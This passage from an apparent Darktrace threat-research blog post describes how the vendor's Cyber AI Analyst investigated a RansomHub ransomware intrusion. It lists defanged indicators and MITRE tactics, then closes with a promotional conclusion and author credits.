Some systems targeted by the attacker went on to exfiltrate data to the likely ReliableSite Bare Metal server, 104.194.10[.]170, via HTTP POSTs over port 5000. Others executed RansomHub ransomware, as evidenced by their SMB-based distribution of ransom notes named 'README_b2a830.txt' and their addition of the extension '.b2a830' to the names of files in network shares.

Through its live investigation of this attack, Cyber AI Analyst created and reported on 38 Incident Events that formed part of a single, wider incident, providing a full picture of the threat actor’s behavior and tactics, techniques, and procedures (TTPs). It identified activity associated with the following tactics across the MITRE attack chain:

  • Execution
  • Discovery
  • Lateral Movement
  • Collection
  • Command and Control
  • Exfiltration
  • Impact (i.e., encryption)
Step-by-step details of one of the network scanning investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 7: Step-by-step details of one of the network scanning investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Step-by-step details of one of the administrative connectivity investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 8: Step-by-step details of one of the administrative connectivity investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
 Step-by-step details of one of the external data transfer investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace. Step-by-step details of one of the external data transfer investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 9: Step-by-step details of one of the external data transfer investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Step-by-step details of one of the data collection and exfiltration investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 10: Step-by-step details of one of the data collection and exfiltration investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Step-by-step details of one of the ransomware encryption investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 11: Step-by-step details of one of the ransomware encryption investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.

Conclusion

Security teams are challenged to keep up with a rapidly evolving cyber-threat landscape, now powered by AI in the hands of attackers, alongside the growing scope and complexity of digital infrastructure across the enterprise.

Traditional security methods, even those that use some simple machine learning, are no longer sufficient, as these tools cannot keep pace with all possible attack vectors or respond quickly enough machine-speed attacks, given their complexity compared to known and expected patterns. Security teams require a step up in their detection capabilities, leveraging machine learning to understand the environment, filter out the noise, and take action where threats are identified. This is where Cyber AI Analyst steps in to help.

Credit to Nathaniel Jones (VP, Security & AI Strategy, FCISO), Sam Lister (Security Researcher), Emma Foulger (Global Threat Research Operations Lead), and Ryan Traill (Analyst Content Lead)

[related-resource]

Continue reading
About the author
Your data. Our AI.
Elevate your network security with Darktrace AI